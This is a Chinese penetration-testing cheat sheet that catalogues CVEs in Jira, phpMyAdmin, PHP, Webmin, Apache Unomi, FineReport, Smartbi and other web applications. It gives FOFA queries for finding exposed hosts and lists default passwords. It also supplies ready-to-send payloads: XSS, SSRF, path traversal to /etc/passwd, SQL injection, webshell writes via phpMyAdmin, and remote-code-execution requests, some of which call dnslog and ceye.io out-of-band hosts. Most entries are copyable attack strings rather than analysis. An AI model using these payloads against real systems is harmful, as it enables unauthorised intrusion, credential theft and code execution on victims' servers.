POC | Payload | exp
CVE-2019-10320 CloudBees Jenkins Credentials Plugin 信息泄露漏洞
-
描述
CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Credentials Plugin 是使用在其中的一个身份凭据存储插件。 Jenkins Credentials Plugin 2.1.18 及之前版本中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
-
影响版本
- jenkins < 2.1.18
-
相关文章
CVE-2019-10392 RCE with Git Client Plugin 2.8.2 (Authenticated)
- POC | Payload | exp
Jira
JIRA 是 Atlassian 公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
jira 的漏洞情报参考 https://jira.atlassian.com/browse/JRASERVER-69858?filter=13085
相关工具
- bcoles/jira_scan
- MayankPandey01/Jira-Lens - Fast and customizable vulnerability scanner For JIRA written in Python
CVE-2017-9506 ssrf
- POC | Payload | exp
/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
CVE-2018-20824 xss
- POC | Payload | exp
/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
CVE-2019-3402 xss
- POC | Payload | exp
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
CVE-2019-3403 信息泄露(用户名枚举)
-
描述
Atlassian Jira 7.13.3 之前版本、8.0.4 之前版本和 8.1.1 之前版本中存在用户名枚举漏洞,攻击者可利用该漏洞枚举用户名称。
-
影响版本
- Atlassian Jira < 7.13.3
- Atlassian Jira 8.0.0 ~ 8.0.4
- Atlassian Jira 8.1.0 ~ 8.1.1
-
POC | Payload | exp
/rest/api/2/user/picker?query=<USERNAME_HERE>
- https://blog.csdn.net/caiqiiqi/article/details/100094987
CVE-2019-8442 Jira 未授权敏感信息泄露
-
描述
Atlassian Jira 是澳大利亚 Atlassian 公司的一套缺陷跟踪管理系统. 该系统主要用于对工作中各类问题、缺陷进行跟踪管理. Atlassian Jira 7.13.4 之前版本、8.0.4 之前版本和 8.1.1 之前版本中的 CachingResourceDownloadRewriteRule 类存在安全漏洞. 远程攻击者可利用该漏洞访问 Jira webroot 中的文件.
-
影响版本
- Atlassian Jira < 7.13.3
- Atlassian Jira 8.0.0 ~ 8.0.4
- Atlassian Jira 8.1.0 ~ 8.1.1
-
POC | Payload | exp
- https://note.youdao.com/ynoteshare1/index.html?id=4189e6fb21fb097a4109ac22f33b16cb&type=note
- https://hackerone.com/reports/632808
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
CVE-2019-8444 存储型 XSS
-
描述
Atlassian Jira 7.13.6之前版本和8.3.2之前的8.x版本中的 wikirenderer 组件存在跨站脚本漏洞。该漏洞源于 WEB 应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
-
影响版本
- Atlassian Jira 7.7 ~ 7.13.6
- Atlassian Jira 8.0.0 ~ 8.3.2
-
POC | Payload | exp
POST /rest/api/2/issue/TEST-7/comment HTTP/1.1 Content-Type: application/json {"body":"!image.png|width=\\\" οnmοuseοver=alert(333);//!"}
CVE-2019-8446 信息泄露(用户名枚举)
-
描述
Atlassian Jira 8.3.2之前版本中的 /rest/issueNav/1/issueTable 资源存在授权问题漏洞。该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。
-
影响版本
- Atlassian Jira 7.6 ~ 8.3.2
-
POC | Payload | exp
CVE-2019-8449
- POC | Payload | exp
/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
- mufeedvh/CVE-2019-8449
CVE-2019-8451 Jira 未授权 SSRF 漏洞
-
描述
Atlassian Jira 8.4.0 之前版本中的 /plugins/servlet/gadgets/makeRequest 资源存在代码问题漏洞。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。
-
影响版本
- Atlassian Jira 7.6.0 ~ 8.4.0
-
POC | Payload | exp
/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com
- jas502n/CVE-2019-8451
CVE-2019-11581 Atlassian Jira 模板注入漏洞
-
描述
Atlassian Jira 多个版本前存在利用模板注入执行任意命令
-
影响版本
- Atlassian Jira 4.4 ~ 7.6.14
- Atlassian Jira 7.7.0 ~ 7.13.5
- Atlassian Jira 8.0.0 ~ 8.0.3
- Atlassian Jira 8.1.0 ~ 8.1.2
- Atlassian Jira 8.2.0 ~ 8.2.3
-
相关文章
CVE-2020-14179 Information Disclosure
- POC | Payload | exp
/secure/QueryComponent!Default.jspa
CVE-2020-14181 User Enumeration
- POC | Payload | exp
/secure/ViewUserHover.jspa?username=<USERNAME>
CVE-2020-36289
- POC | Payload | exp
/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
CVE-2021-26086
-
相关文章
-
影响版本
- Atlassian Jira < 8.5.14
- Atlassian Jira 8.6.0 ~ 8.13.6
- Atlassian Jira 8.14.0 ~ 8.16.1
-
POC | Payload | exp
/s/cfx/_/;/WEB-INF/web.xml /s/cfx/_/;/WEB-INF/decorators.xml /s/cfx/_/;/WEB-INF/classes/seraph-config.xml /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
CVE-2021-43947
CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF
-
相关文章
-
POC | Payload | exp
JumpServer
JumpServer远程执行漏洞
-
相关文章
-
POC | Payload | exp
Jupyter
官网 : https://jupyter.org/
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。
未授权访问漏洞
-
描述
如果管理员未为 Jupyter Notebook 配置密码,将导致未授权访问漏洞,游客可在其中创建一个 console 并执行任意 Python 代码和命令。
-
示例
http://[ip]:8888
Kibana
CVE-2018-17246 Kibana Local File Inclusion
- POC | Payload | exp
CVE-2019-7609
-
相关文章
-
POC | Payload | exp
KodExplorer
fofa: app="Powered-by-KodExplorer"
fofa: icon_hash="1636007688"
kodexplorer 4.32 SSRF漏洞
- POC | Payload | exp
/index.php?app/getUrlTitle&url=192.168.1.1 # 通过返回的时间判断是否存活
Reflected xss
- POC | Payload | exp
/index.php?explorer/fileView&path=</script><script>alert(1234)</script>
svg ssrf
- POC | Payload | exp
<?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="overflow: hidden; position: relative;" width="300" height="200"> <image x="10" y="10" width="276" height="110" xlink:href="http://127.0.0.1:8000/svg" stroke-width="1" id="image3204" /> <rect x="0" y="150" height="10" width="300" style="fill: black"/> </svg>
svg xss
- POC | Payload | exp
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graph ics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg "> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width :3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert(document.domain); </script> </svg>
Konga
Konga任意用户登录
- 相关文章
MetaBase
fofa: app="Metabase"
CVE-2021-41277 MetaBase任意文件读取漏洞
-
相关文章
-
影响版本
- MetaBase < 0.40.5
- 1.0.0 <= MetaBase < 1.40.5
-
POC | Payload | exp
/api/geojson?url=file:/etc/passwd
MinIO
fofa: app="MinIO-Console"
CVE-2021-21287 MinIO未授权SSRF漏洞
- 相关文章
CVE-2021-41266
Moodle
fofa: app="moodle"
CVE-2021-36393
CVE-2021-36394
CVE-2021-40691
- 相关文章
CVE-2022-0332
Nagios
CVE-2022-29272
- POC | Payload | exp
Nexus
默认密码
admin admin123
CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0
-
描述
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发 Maven、NuGET 等软件源仓库.其 3.14.0 及之前版本中,存在一处基于 OrientDB 自定义函数的任意 JEXL 表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞.
-
影响版本
- nexus < 3.15.0
-
相关文章
-
POC | Payload | exp
CVE-2020-10199/CVE-2020-10204
-
相关文章
-
POC | Payload | exp
CVE-2020-29436
NiFi
Fofa: "nifi" && title=="NiFi"
NiFi 未授权
- POC | Payload | exp
/nifi/ /nifi-api/flow/current-user /nifi-api/flow/process-groups/root /nifi-api/access/config
NiFi Api 远程代码执行
- POC | Payload | exp
use exploit/multi/http/apache_nifi_processor_rce
nodejs
noVNC
官网 : https://novnc.com
CVE-2017-18635 xss
-
描述
noVNC 是一款 HTML VNC(Virtual Network Computing)客户端库。 noVNC 0.6.2之前版本中存在跨站脚本漏洞。该漏洞源于 WEB 应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
-
影响版本
- novnc < 0.6.2
-
相关文章
-
POC | Payload | exp
nps
nps认证绕过漏洞
- 漏洞利用工具
OFBiz
Fofa: app="Apache_OFBiz"
CVE-2020-9496 Ofbiz反序列化漏洞
-
相关文章
-
POC | Payload | exp
CVE-2021-26295 RMI反序列化漏洞
-
相关文章
-
POC | Payload | exp
CVE-2021-29200 Apache OFBiz RMI Bypass RCE
-
相关文章
-
POC | Payload | exp
CVE-2021-30128
-
相关文章
-
POC | Payload | exp
OpenAM
fofa: app="OpenAM"
CVE-2021-29156
CVE-2021-35464
phpMyAdmin
搭建教程
相关文章
- phpMyadmin各版本漏洞 - 2/3 老版本的漏洞
- phpMyAdmin后台Getshell总结
通过 phpmyadmin 来 getshell
-
确认绝对路径
利用 log 变量,猜绝对路径
或者直接查询
select @@basedir;
直接 SQL 写文件
select '<?php phpinfo(); ?>' INTO OUTFILE 'C:/phpStudy/PHPTutorial/WWW/a.php';
如果 file_priv 为 null,那么是写不了的,可以尝试使用日志写马
set global general_log='on'; set global general_log_file='C:/phpStudy/PHPTutorial/WWW/a.php'; select '<?php phpinfo(); ?>'; set global general_log=off;
CVE-2016-5734 4.0.x—4.6.2 远程代码执行漏洞
-
描述
phpMyAdmin 中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用 preg_replacee 修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意 PHP 代码。以下版本受到影响:phpMyAdmin4.0.10.16之前4.0.x版本,4.4.15.7之前4.4.x版本,4.6.3之前4.6.x版本。
-
影响版本
- phpmyadmin 4.0.0 ~ 4.0.10.15
- phpmyadmin 4.4.0 ~ 4.4.15.6
- phpmyadmin 4.6.0 ~ 4.6.2
-
POC | Payload | exp
phpMyAdmin 4.7.x CSRF
CVE-2018-12613 4.8.x 本地文件包含漏洞利用
- 相关文章
- phpMyAdmin 4.8.x 本地文件包含漏洞利用 | Vulnspy Blog 可以通过这个线上靶场实验,不过 docker 镜像可能有点问题,mysql 进程起不起来,我的解决方式是直接卸了重装 mysql-server,而且他默认的 apt 源无法访问,还要换一下 apt 源
- phpmyadmin4.8.1后台getshell
- CVE-2018-12613漏洞学习总结
CVE-2019-6799
-
相关文章
-
POC | Payload | exp
Gifts/Rogue-MySql-Servervim rogue_mysql_server.py PORT = 3307
python rogue_mysql_server.py
打开目标 phpMyAdmin 的登录页面,地址输入 db:3307、用户名、密码,提交登录.
回到 db 的终端,如果文件读取成功会将文件内容记录到 mysql.log 文件中
CVE-2019-12922 4.9.0.1 CSRF
-
描述
phpMyAdmin 4.9.0.1 版本中存在跨站请求伪造漏洞。该漏洞源于 WEB 应用未充分验证请求是否来自可信用户。攻击者可利用该漏洞通过受影响客户端向服务器发送非预期的请求。
-
影响版本
- phpmyadmin 4.9.0.1
-
POC | Payload | exp
<img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" />
- https://www.hedysx.com/bug/2398.html
CVE-2019-18622 xss
- 相关文章
CVE-2020-26935 phpmyadmin后台SQL注入
- POC | Payload | exp
/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
CVE-2022-23808 phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)
- POC | Payload | exp
PHP
CVE-2012-1823 PHPCGI 远程代码执行漏洞
-
描述
5.3.12 之前和 5.4.2 之前的 5.4.x 中的 sapi/cgi/cgi_main.c 在配置为 CGI 脚本(aka php-cgi)时,不能正确处理缺少=(等号)字符的查询字符串 ,它允许远程攻击者通过在查询字符串中放置命令行选项来执行任意代码,这与在"d"情况下缺少跳过某些 php_getopt 有关。
-
影响版本
- php < 5.3.12
- php < 5.4.2
-
相关文章
-
POC | Payload | exp
来源: https://vulhub.org/#/environments/php/CVE-2012-1823/
http://你的 IP 地址:端口号/index.php?-s
即爆出源码发送如下数据包,可见 Body 中的代码已被执行:
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: example.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 31 <?php echo shell_exec("id"); ?>
-
MSF Module
use exploit/multi/http/php_cgi_arg_injection
CVE-2018-19518 PHP imap 远程命令执行漏洞
-
描述
php imap 扩展用于在 PHP 中执行邮件收发操作.其 imap_open 函数会调用 rsh 来连接远程 shell,而 debian/ubuntu 中默认使用 ssh 来代替 rsh 的功能 (也就是说,在 debian 系列系统中,执行 rsh 命令实际执行的是 ssh 命令) .
因为 ssh 命令中可以通过设置 -oProxyCommand= 来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞.
-
影响版本
- php 5.6.0 ~ 5.6.38
- php 7.0.0 ~ 7.0.32
- php 7.1.0 ~ 7.1.24
- php 7.2.0 ~ 7.2.12
-
POC | Payload | exp
LFI with phpinfo
-
描述
PHP 文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来 getshell.因为临时文件名是随机的,如果目标网站上存在 phpinfo,则可以通过 phpinfo 来获取临时文件名,进而进行包含.
-
POC | Payload | exp
PHP 环境 XML 外部实体注入漏洞 (XXE)
-
描述
libxml2.9.0 以后,默认不解析外部实体.
-
POC | Payload | exp
XDebug 远程调试漏洞 (代码执行)
-
描述
XDebug 是 PHP 的一个扩展,用于调试 PHP 代码.如果目标开启了远程调试模式,并设置
remote_connect_back = 1
:xdebug.remote_connect_back = 1 xdebug.remote_enable = 1
这个配置下,我们访问 http://target/index.php?XDEBUG_SESSION_START=phpstorm ,目标服务器的 XDebug 将会连接访问者的 IP (或
X-Forwarded-For
头指定的地址) 并通过 dbgp 协议与其通信,我们通过 dbgp 中提供的 eval 方法即可在目标服务器上执行任意 PHP 代码. -
相关文章
-
POC | Payload | exp
PHP-FPM
PHP-FPM 是一个 PHPFastCGI 管理器,对于 PHP 5.3.3 之前的 php 来说,是一个补丁包 ,旨在将 FastCGI 进程管理整合进 PHP 包中。
PHP-FPM Fastcgi 未授权访问漏洞
-
相关文章
-
POC | Payload | exp
CVE-2019-11043 PHP-FPM 远程代码执行漏洞
-
描述
在长亭科技举办的 Real World CTF 中,安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞.
在使用一些有错误的 Nginx 配置的情况下,通过恶意构造的数据包,即可让 PHP-FPM 执行任意代码.
-
影响版本
- php 7.1.0 ~ 7.1.33
- php 7.2.0 ~ 7.2.24
- php 7.3.0 ~ 7.3.11
-
相关文章
-
POC | Payload | exp
PHPUnit
CVE-2017-9841 eval-stdin.php 远程命令执行漏洞
-
相关文章
-
POC | Payload | exp
curl --data "<?php print str_rot13('V pna erzbgryl rkrphgr CUC pbqr ba lbhe freire');" http://localhost:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
PHPMailer
CVE-2017-5223 任意文件读取漏洞
- 相关文章
Portainer
fofa: app="portainer"
相关文章
Prometheus
fofa: app="Prometheus-Time-Series-Collection-and-Processing-Server"
相关文章
rConfig
fofa: app="rConfig"
rConfig 3.9.6 rce
ResourceSpace
fofa: app="ResourceSpace"
CVE-2015-3648
- POC | Payload | exp
/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
CVE-2021-41765
-
影响版本
- ResourceSpace <= 9.5
-
相关文章
CVE-2021-41950
CVE-2021-41951
-
影响版本
- ResourceSpace <= 9.5
-
相关文章
SaltStack
fofa: app="SALTSTACK-产品"
CVE-2020-11651 SaltStack认证绕过
-
默认端口
4505 publish_port 提供远程执行命令发送功能 4506 ret_port 支持认证、文件服务、结果收集等功能 8000 salt‐api
-
相关文章
-
POC | Payload | exp
CVE-2020-16846/25592
CVE-2021-25281/25282/25283
SAP
fofa: app="SAP-Web-Application-Server"
相关资源
CVE-2018-2380 SAP NetWeaver AS JAVA CRM Remote Command Execution via Log injection
- POC | Payload | exp
CVE-2020-6207 SAP Solution Manager RCE
- POC | Payload | exp
CVE-2020-6287
- POC | Payload | exp
CVE-2020-6308
-
描述
SAP BusinessObjects Business Intelligence平台(Web服务)版本-410、420、430允许未经身份验证的攻击者注入任意值作为CMS参数,以在内部网络上执行查找,否则将无法从外部访问该内部网络
-
POC | Payload | exp
/AdminTools/querybuilder/logon?framework= aps=xxx.dnslog.cn&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
Sentinel
sentinel-dashboard ssrf
-
相关文章
-
POC | Payload | exp
curl -XGET 'http://127.0.0.1:8080/registry/machine?app=SSRF-TEST&appType=0&version=0&hostname=TEST&ip=localhost:12345%23&port=0'
SharePoint
CVE-2022-29108
ShenYu
fofa: body="id="httpPath"" && body="th:text="${domain}""
CVE-2021-37580 Apache ShenYu Admin 身份验证绕过漏洞
-
相关文章
-
影响范围
- Apache ShenYu 2.3.0
- Apache ShenYu 2.4.0
-
POC | Payload | exp
/dashboardUser
CVE-2021-45029 Apache ShenYu Groovy&SpEL表达式注入漏洞
ShowDoc
fofa: app="ShowDoc"
ShowDoc 前台任意文件上传
- 相关文章
SkyWalking
fofa: app="APACHE-Skywalking"
Apache Skywalking <=8.3 SQL注入
Smartbi
fofa: app="SMARTBI"
常见口令
- demo/demo
- manager/demo
- admin/admin
- admin/manager
- admin/2manager
相关文章
Tips
- http://127.0.0.1:18080/smartbi/vision/config.jsp 可能未修改密码或者密码为 manager
任意文件读取
- POC | Payload | exp
/vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=%E4%B8%AD%E5%9B%BD%E7%9F%B3%E6%B2%B9%E5%90%89%E6%9E%97%E7%99%BD%E5%9F%8E%E9%94%80%E5%94%AE%E5%88%86%E5%85%AC%E5%8F%B8XX%E5%8A%A0%E6%B2%B9%E7%AB%99%E9%98%B2%E9%9B%B7%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E9%A2%84%E6%A1%88.docx
wsdl泄露
- POC | Payload | exp
/vision/services/CatalogService?wsdl SimpleReportService 提供灵活报表相关操作功能 https://127.0.0.1/vision/services/SimpleReportService?wsdl BusinessViewService 提供数据集定义相关操作功能 https://127.0.0.1/vision/services/BusinessViewService?wsdl DataSourceService 提供数据源相关操作功能 https://127.0.0.1/vision/services/DataSourceService?wsdl AnalysisReportService 提供多维分析相关操作功能 https://127.0.0.1/vision/services/AnalysisReportService?wsdl UserManagerService 提供用户相关操作,包括:读取/维护用户信息、读取/维护组信息、读取/维护角色信息、为用户和组分配角色等 https://127.0.0.1/vision/services/UserManagerService?wsdl
后台目录遍历
- POC | Payload | exp
/vision/chooser.jsp?key=CONFIG_FILE_DIR&root=C%3A%2F /vision/monitor/sysprops.jsp /vision/monitor/getclassurl.jsp?classname=smartbi.freequery.expression.ast.TextNode /vision/monitor/hardwareinfo.jsp
后台 session 窃取
- POC | Payload | exps
/vision/monitor/listsessions.jsp # 查看session
后台内存 dump
- POC | Payload | exp
/vision/monitor/heapdump.jsp # 缓存抓取密码,使用Eclipse Memory Analyzer解析内存文件 /vision/monitor/heapdump.jsp?dumpbin=true
后台SSRF
- POC | Payload | exp
/vision/monitor/testmailserver.jsp
SolarWinds
CVE-2020-10148
-
影响版本
SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本
-
相关文章
CVE-2021-35215
SonarQube
fofa: app="sonarQube-代码管理"
管理员密码默认为admin/admin
相关文章
CVE-2020-27986
-
相关文章
-
POC | Payload | exp
/api/settings/values 泄露SMTP、SVN和Gitlab密码。 /api/webservices/list 泄露接口信息
Supervisord
搭建教程
测试链接
http://[ip]:9001
CVE-2017-11610 Supervisord 远程命令执行漏洞
-
描述
supervisor 中的 XML-RPC 服务器允许远程身份验证的用户通过精心编制的与嵌套 supervisord 命名空间查找相关的 XML-RPC 请求执行任意命令。
-
影响版本
- supervisor < 3.0
- supervisor 3.1.0 ~ 3.3.2
-
相关文章
TerraMaster-TOS
相关文章
CVE-2020-15568 exportUser.php 远程命令执行
- POC | Payload | exp
http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>1.txt http://xxx.xxx.xxx.xxx/include/1.txt
CVE-2020-28185 用户枚举漏洞
- POC | Payload | exp
CVE-2020-28186 任意账号密码修改漏洞
- POC | Payload | exp
CVE-2020-28187 后台任意文件读取漏洞
- POC | Payload | exp
/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
CVE-2020-28188 upload
- POC | Payload | exp
CVE-2022-24990 createRaid 远程命令执行
trojan多用户管理部署程序
相关文章
命令注入漏洞
- POC | Payload | exp
默认 jwt 密钥
- POC | Payload | exp
TRS_WAS
Fofa: body="/was5/"
TRS(拓尔思)WCM任意文件上传漏洞
-
描述
file_upload.html 未做访问限制,攻击者可以匿名访问上传页面进行文件上传操作。
-
影响版本
- WCM5.2
- WCM6.1
-
POC | Payload | exp
xxx.com/file/file_upload.html、infogate/file/file_upload.html
TRS(拓尔思)WAS 4.5 SQL注入漏洞
-
描述
rss.jsp 页面 "channelid" 参数未进行过滤
-
影响版本
- WAS 4.5
-
POC | Payload | exp
/wcm/help/wcmhelp_list.jsp?trandom=0.3575719151171357&JspUrl=http://xxx/wcm/#/loginpage.jsp' and (select top 1 username+char(124)+password from wcmuser)>0--
CNVD-2020-27769 拓尔思TRSWAS_5.0任意文件读取
-
描述
该漏洞成因为 web/tree 接口 treefile 参数存在文件读取漏洞,可读取数据库配置文件、账户密码等信息,导致配置文件信息泄露威胁网站安全。
-
影响版本
- TRSWAS_5.0
-
POC | Payload | exp
http://xxx.com/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties
Unomi
Fofa: title="Unomi"
CVE-2020-13942 rce
- POC | Payload | exp
POST /context.json HTTP/1.1 Host: x.x.x.x Connection: close Pragma: no-cache Cache-Control: no-cache sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://x.x.x.x/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Length: 491 { "filters": [ { "id": "sample", "filters": [ { "condition": { "parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec('ping 1.dnslog.cn');" }, "type": "profilePropertyCondition" } } ] } ], "sessionId": "sample" }
Webmin
搭建教程
CVE-2019-12840
- POC | Payload | exp
CVE-2019-15107 Webmin Remote Code Execution
-
描述
在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令.
-
影响版本
- Webmin < 1.920
-
相关文章
-
POC | Payload | exp
POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60 user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
CVE-2019-15642 Webmin Remote Code Execution
-
描述
Webmin 到 1.920 中的 rpc.cgi 允许通过精心设计的对象名称进行经过身份验证的远程代码执行,因为 unserialise_variable 进行了 eval 调用。注意:Webmin_Servers_Index 文档指出“ RPC 可用于运行任何命令或修改服务器上的任何文件,这就是为什么不得将它的访问权限授予不可信的 Webmin 用户的原因。”
-
影响版本
- Webmin < 1.920
-
POC | Payload | exp
CVE-2020-35606
- POC | Payload | exp
/package-updates/update.cgi application/x-www-form-urlencoded redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26
XXL-job
fofa: app="XXL-JOB"
RESTful API 未授权访问RCE
-
相关文章
-
POC | Payload | exp
zabbix
官网 : https://www.zabbix.com
fofa: app="ZABBIX-监控系统"
zabbix 是一款服务器监控软件,其由 server、agent、web 等模块组成,其中 web 模块由 PHP 编写,用来显示数据库中的结果.
搭建教程
CVE-2016-10134 zabbix latest.php SQL 注入漏洞
-
描述
Zabbix 的 latest.php 中的 toggle_ids[] 或 jsrpc.php 中的 profieldx2 参数存在 sql 注入,通过 sql 注入获取管理员账户密码,进入后台,进行 getshell 操作。
-
影响版本
- zabbix < 2.2.13
- zabbix 3.0.0 ~ 3.0.3
-
相关文章
CVE-2020-11800 zabbix RCE
-
描述
Zabbix Server 的 trapper 命令处理,存在命令注入漏洞,可导致远程代码执行。
-
相关文章
CVE-2021-27927
CVE-2022-23131
-
相关文章
-
POC | Payload | exp
CVE-2022-23134
Zimbra
相关文章
Zoho-ManageEngine
CVE-2020-28653
任意文件上传
CVE-2021-40539
CVE-2021-41081
CVE-2021-44077
CVE-2021-44515
- 相关文章
CVE-2022-28219
CVE-2022-29081
宝塔
fofa: app="宝塔-Linux控制面板"
相关资源
- Hzllaga/BT_Panel_Privilege_Escalation - 宝塔面板Windows版提权方法
宝塔面板 phpMyadmin 未授权访问
- POC | Payload | exp
xxx.xxx.xxx.xxx:888/pma
宝塔 <6.0 存储形xss
禅道
fofa: app="易软天创-禅道系统"
CNVD-2020-65242 后台任意文件下载
- POC | Payload | exp
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file
后台 im 模块 downloadXxdPackage 函数任意文件下载
- POC | Payload | exp
index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd
12.4.2后台管理员权限Getshell
帆软
fofa: app="帆软-FineReport"
fofa: body="/WebReport/ReportServer"
fofa: body="isSupportForgetPwd"
帆软报表目录遍历
- POC | Payload | exp
/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
CNVD-2018-04757 帆软报表 v8.0 任意文件读取漏洞
帆软 V9 任意文件覆盖getshell
-
相关文章
-
POC | Payload | exp
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1 Host: 192.168.10.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE Connection: close Content-Type:text/xml;charset=UTF-8 Content-Length: 74 {"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}
帆软报表 FineRePort 未授权远程命令执行漏洞
-
影响版本
- 帆软报表 FineRePortv8.0
- 帆软报表 FineRePortv9.0
-
POC | Payload | exp
xxx.com/WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin 这个接口 打开 点查询 burp 拦截数据包 替换 post 的内容 __parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://xxxx.ceye.io');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}
